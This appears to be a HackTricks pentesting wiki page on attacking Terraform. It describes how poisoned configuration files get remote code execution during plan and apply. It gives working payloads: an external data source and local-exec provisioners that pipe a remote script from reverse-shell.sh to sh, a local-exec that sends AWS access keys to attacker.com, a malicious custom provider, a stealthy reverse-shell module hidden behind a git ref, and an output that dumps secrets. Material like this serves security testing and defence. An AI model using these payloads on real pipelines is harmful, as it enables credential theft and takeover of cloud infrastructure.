Links

Terraform Security

Support HackTricks and get benefits!

Basic Information

HashiCorp Terraform is an infrastructure as code tool that lets you define both cloud and on-prem resources in human-readable configuration files that you can version, reuse, and share. You can then use a consistent workflow to provision and manage all of your infrastructure throughout its lifecycle. Terraform can manage low-level components like compute, storage, and networking resources, as well as high-level components like DNS entries and SaaS features.

How does Terraform work?

Terraform creates and manages resources on cloud platforms and other services through their application programming interfaces (APIs). Providers enable Terraform to work with virtually any platform or service with an accessible API.
HashiCorp and the Terraform community have already written more than 1700 providers to manage thousands of different types of resources and services, and this number continues to grow. You can find all publicly available providers on the Terraform Registry, including Amazon Web Services (AWS), Azure, Google Cloud Platform (GCP), Kubernetes, Helm, GitHub, Splunk, DataDog, and many more.
The core Terraform workflow consists of three stages:
  • Write: You define resources, which may be across multiple cloud providers and services. For example, you might create a configuration to deploy an application on virtual machines in a Virtual Private Cloud (VPC) network with security groups and a load balancer.
  • Plan: Terraform creates an execution plan describing the infrastructure it will create, update, or destroy based on the existing infrastructure and your configuration.
  • Apply: On approval, Terraform performs the proposed operations in the correct order, respecting any resource dependencies. For example, if you update the properties of a VPC and change the number of virtual machines in that VPC, Terraform will recreate the VPC before scaling the virtual machines.

Terraform Enterprise

Terraform Enterprise allows you to run commands such as terraform plan or terraform apply remotely in a self-hosted version of Terraform Cloud. Therefore, if you find the API key to access that Terraform server, you can compromise it. For more info check:

Terraform Lab

Just install terraform in your computer.
Here you have a guide and here you have the best way to download terraform.

RCE in Terraform

Terraform doesn't have a platform exposing a web page or a network service we can enumerate, therefore, the only way to compromise terraform is to be able to add/modify terraform configuration files.
However, terraform is a very sensitive component to compromise because it will have privileged access to different locations so it can work properly.
The main way for an attacker to be able to compromise the system where terraform is running is to compromise the repository that stores terraform configurations, because at some point they are going to be interpreted.
Actually, there are solutions out there that execute terraform plan/apply automatically after a PR is created, such as Atlantis:
If you are able to compromise a terraform file there are different ways you can perform RCE when someone executed terraform plan or terraform apply.

Terraform plan

Terraform plan is the most used command in terraform and developers/solutions using terraform call it all the time, so the easiest way to get RCE is to make sure you poison a terraform config file that will execute arbitrary commands in a terraform plan.

Using an external provider

Terraform offers the external provider which provides a way to interface between Terraform and external programs. You can use the external data source to run arbitrary code during a plan.
Injecting in a terraform config file something like the following will execute a rev shell when executing terraform plan:
data "external" "example" {
program = ["sh", "-c", "curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh"]
}

Using a custom provider

Anyone can write a custom provider and publish it to the Terraform Registry. You could also try to pull a custom provider from a private registry.
That’s it:
  • write a custom provider than runs some malicious code (like exfiltrating credentials or customer data)
    • publish it to the Terraform Registry
    • add the provider to the Terraform code in a feature branch
    • open a PR for the feature branch
terraform {
required_providers {
evil = {
source = "evil/evil"
version = "1.0"
}
}
}
​
provider "evil" {}
Since the provider will be pulled in during the init and run some code during the plan, you have arbitrary code execution.

Using an external reference

Both mentioned options are useful but not very stealthy (the second is more stealthy but more complex than the first one). You can perform this attack even in a stealthier way, by following this suggestions:
  • Instead of adding the rev shell directly into the terraform file, you can load an external resource that contains the rev shell:
module "not_rev_shell" {
source = "[email protected]:carlospolop/terraform_external_module_rev_shell//modules"
}
  • In the external resource, use the ref feature to hide the terraform rev shell code in a branch inside of the repo, something like: [email protected]:carlospolop/terraform_external_module_rev_shell//modules?ref=b401d2b

Terraform Apply

Terraform apply will be executed to apply all the changes, you can also abuse it to obtain RCE injecting a malicious Terraform file with local-exec. ****You just need to make sure some payload like the following ones ends in the main.tf file:
// Payload 1 to just steal a secret
resource "null_resource" "secret_stealer" {
provisioner "local-exec" {
command = "curl https://attacker.com?access_key=$AWS_ACCESS_KEY&secret=$AWS_SECRET_KEY"
}
}
​
// Payload 2 to get a rev shell
resource "null_resource" "rev_shell" {
provisioner "local-exec" {
command = "sh -c 'curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh'"
}
}
Follow the suggestions from the previous technique the perform this attack in a stealthier way using external references.

Secrets Dumps

You can have secret values used by terraform dumped running terraform apply by adding to the terraform file something like:
output "dotoken" {
value = nonsensitive(var.do_token)
}

Audit Tools

  • ​tfsec: tfsec uses static analysis of your terraform code to spot potential misconfigurations.
  • ​terascan: Terrascan is a static code analyzer for Infrastructure as Code.

References

Support HackTricks and get benefits!